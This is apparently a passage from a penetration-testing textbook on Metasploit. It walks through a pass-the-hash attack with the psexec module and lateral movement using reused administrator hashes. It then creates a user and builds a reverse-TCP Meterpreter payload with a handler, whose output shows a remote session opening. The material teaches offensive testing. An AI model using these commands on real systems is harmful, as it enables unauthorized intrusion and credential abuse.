Meterpreter
[*] Uploading payload...
[*] Created \JsOvAFLy.exe...
After we select the smb/psexec module and set the LHOST, LPORT, and RHOST options, we set the SMBPass variable to the hash we dumped earlier instead of a password. As the listing shows, authentication succeeds and we get our Meterpreter session. We didn't have to crack a password, and no plaintext password was ever needed: we obtained Administrator privileges using the password hash alone. This is a pass-the-hash attack; the SMB authentication exchange only proves possession of the hash, so the hash itself is the credential.
When we successfully compromise one system on a large network, in most cases that system will have the same local administrator account, and therefore the same hash, on multiple systems. This attack lets us hop from one system to another without ever needing to crack the password itself.
Privilege Escalation
Now that we have access to the system, we can create a normal user account with limited permissions using the net user command. We'll create a new user account to demonstrate how to elevate permissions as that user. (You will learn more about this in Chapter 8.)
When we compromise a limited user account, we will run into restrictions that prevent us from executing commands that require administrative-level permissions. By elevating an account's permissions, we overcome that restriction.
On a Windows XP target machine, we enter the following command from an administrative prompt:
C:\Documents and Settings\Administrator> net user bob password123 /add
Next, we create a Meterpreter-based payload, payload.exe, copy it to the target XP machine, and run it under the user account bob. This will be our new limited user account. In this example, we use msfpayload to create a Meterpreter-based payload as a normal Windows executable and msfcli to start the matching handler. (We'll discuss msfpayload in more detail in Chapter 7. Note that current Metasploit releases have retired msfpayload and msfcli; msfvenom now generates payloads and the handler is started from msfconsole.)
root@bt:/opt/framework3/msf3# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.33.129 LPORT=443 X > payload.exe
root@bt:/opt/framework3/msf3# msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.33.129 LPORT=443 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.33.129:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:443 -> 192.168.33.130:1056)
meterpreter > getuid
Server username: IHAZSECURITY\bob